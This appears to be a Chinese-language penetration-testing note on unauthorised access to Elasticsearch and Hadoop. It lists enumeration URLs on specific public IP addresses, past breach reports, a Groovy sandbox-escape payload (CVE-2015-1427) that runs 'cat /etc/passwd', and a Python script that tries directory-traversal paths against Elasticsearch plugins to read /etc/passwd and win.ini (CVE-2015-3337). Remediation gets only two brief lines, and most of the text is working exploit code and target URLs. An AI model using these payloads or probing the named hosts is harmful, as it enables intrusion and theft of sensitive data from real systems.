基本说明
VulBOX
https://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html
延伸阅读
https://www.ichunqiu.com/course/1413
Redis未授权访问
其他 NoSQL未授权访问
MongoDB、Redis、ES、Memcached、Hadoop
漏洞描述
ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放9200端口,可被非法操作数据。
漏洞检测
默认端口 9200 HTTP协议
返回内容中包含”You Know, for Search”
(另外,AWVS也可发现)
一般来说,出现这种问题的多数是默认配置的ElasticSearch
(粗检只考虑9200,如果是作为甲方那还是要所有端口过一遍)
所以只要检测9200就好了,如果端口不在9200,通常说明运维、开发者可能已经在考虑一些安全性问题,也就没必要深究了。
一些利用的URL
节点URL
1
2
3
4
5
6
7
8
|
http:
//101.198.161.130:9200/_cat/indices/
http:
//101.198.161.130:9200/_plugin/head/
http:
//101.198.161.130:9200/_nodes
http:
//101.198.161.130:9200/_nodes?prettify
http:
//101.198.161.130:9200/_status
http:
//101.198.161.130:9200/_search?pretty
http:
//10.203.9.131:9200/zjftu/
http:
//10.203.9.131:9200/zjftu/_search?pretty
|
Hadoop未授权访问
1
2
|
http:
//103.15.200.81:50070/dfshealth.jsp
http:
//103.15.200.81:50070/logs/
|
漏洞危害
可被非法操作数据,对网站数据造成影响。
修复方案
1.关闭9200端口
2.防火墙上设置禁止外网访问此端口。
历史事件漏洞
安全脉搏搜索
乌云镜像搜索
CNVD搜索
1 360手机一处Elasticsearch未授权访问 (2016-04-19)
https://www.secpulse.com/archives/46394.html
2 暴风某站Elasticsearch未授权访问&Hadoop未授权访问(2016-04-27)
https://www.secpulse.com/archives/49115.html
3 新华网某频道服务器一处Elasticsearch配置不当/可任意操作/涉及被采访人员信息(2016-03-19)
https://www.secpulse.com/archives/46976.html
(ElasticSearch RCE)
4 神器而已证券系列之九州证券某站Elasticsearch远程代码执行漏洞(2015-09-11 18:30)
(内含少量内网套路)
https://www.secpulse.com/archives/39822.html
5 风行某站Elasticsearch配置不当(任意文件读取)
https://www.secpulse.com/archives/41126.html
6 上海某服务器一处Elasticsearch配置不当/可任意操作/涉及大量敏感信息(790多W用户姓名\身份证号\民族\开房时间\退房时间\房间号等)(2016-03-16)
https://www.secpulse.com/archives/46801.html
7 广西移动一处Elasticsearch配置不当/可任意操作/涉及大量敏感信息(用户手机号码/IMEI/IMSI/上网时间/地点等)
https://www.secpulse.com/archives/46798.html
ElasticSearch Groovy RCE (CVE-2015-1427)
影响范围
The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
对一下链接进行一个POST
http://127.0.0.1:9200/_search?pretty
POST的data域如下
1
|
{
"size":
1,
"script_fields": {
"iswin": {
"script":
"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()",
"lang":
"groovy"}}}
|
几个其他Exp
https://www.waitalone.cn/elasticsearch-exp.html
https://www.waitalone.cn/elasticsearch.html
http://www.freebuf.com/sectool/38025.html
http://blog.csdn.net/u011066706/article/details/51175761
es_poc_1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
#!/usr/bin/env python
#-*- coding:utf-
8 -*-
import requests
host=
"10.203.9.131"
port =
9200
def elastic_directoryTraversal(host,port):
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
pList = ['/../../../../../../../../../../../../../../etc/passwd','/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/etc/passwd','/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/
%c0
%ae
%c0
%ae/windows/win.ini']
for p in pluginList:
for path in pList:
urlA =
"http://%s:%d/_plugin/%s%s" % (host,port,p,path)
try:
content = requests.get(urlA,timeout=
5,allow_redirects=True,verify=False).content
print content
print
"\n-------------------------------------------------------------\n"
if
"/root:/" in content:
print 'Elasticsearch 任意文件读取漏洞(CVE-
2015-
3337) Found!'
except Exception,e:
print e
elastic_directoryTraversal(host,port)
|